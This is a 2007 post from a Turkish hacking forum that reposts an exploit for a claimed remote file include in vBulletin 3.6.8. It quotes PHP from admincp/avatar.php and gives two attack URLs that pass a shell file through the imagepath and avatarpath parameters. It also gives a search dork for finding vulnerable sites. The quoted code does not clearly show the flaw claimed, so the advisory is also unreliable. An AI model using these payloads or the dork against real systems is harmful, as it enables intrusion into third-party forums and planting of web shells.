HGT Hack Good Team
Would you like to react to this message? Create an account in a few clicks or log in to continue.
HGT Hack Good Team

Sitemize Hos Geldiniz
 
AnasayfaAnasayfa  PortalliPortalli  AramaArama  Latest imagesLatest images  Kayıt OlKayıt Ol  Giriş yap  

 

 vBulletin 3.6.8 Remote File Include

Aşağa gitmek 
YazarMesaj
Admin
Admin
Admin
Admin


Mesaj Sayısı : 131
Kayıt tarihi : 12/10/07

vBulletin 3.6.8 Remote File Include Empty
MesajKonu: vBulletin 3.6.8 Remote File Include   vBulletin 3.6.8 Remote File Include Icon_minitimePtsi Ekim 15, 2007 2:13 pm

#Exploit
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#namer_jenin Dr_jenin@jenin.net ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#web : http://www.u4rock.com/vb/------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# scrept:vBulletin 3.6.8

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#Code in:
$admincp/avatar.php
#Vul code:Vul code:
{
global $vbphrase;
if ($imagepath == '')
{
print_stop_message('please_complete_required_fields');
}
if ($fp = @fopen($imagepath . '/test.image', 'wb'))
{
fclose($fp);
if (!@unlink($imagepath . '/test.image'))
{
print_stop_message('test_file_write_failed', $imagepath);
}
return true;
}
else
{
print_stop_message('test_file_write_failed', $imagepath);
}
}

$vbulletin->input->clean_array_gpc('r', array(
'avatarpath' => TYPE_STR,
'avatarurl' => TYPE_STR,
'profilepicpath' => TYPE_STR,
'profilepicurl' => TYPE_STR,
'sigpicpath' => TYPE_STR,
'sigpicurl' => TYPE_STR,
'dowhat' => TYPE_STR
));



-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#Exploit
http://name.com/vBulletin 3.6.8/admincp/avatar.php?imagepath=sshell.txt?


http://name.com/vBulletin 3.6.8/admincp/avatar.php?avatarpath=sshell.txt?





------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#dork: allurl"vBulletin 3.6.8"
--------------------------------------------------------------------------------------------


.: اكاديمية الهكر العربى )::.
Powered By Hell Team
--------------------------------------------------------------------------
bay bay Dr_jenin الله اكبر
Sayfa başına dön Aşağa gitmek
https://hackgoodteam.yetkin-forum.com
 
vBulletin 3.6.8 Remote File Include
Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities
» GetMyOwnArcade (search.php query) Remote SQL Injection Vulne

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
HGT Hack Good Team :: Hacking :: Exploitler-
Buraya geçin: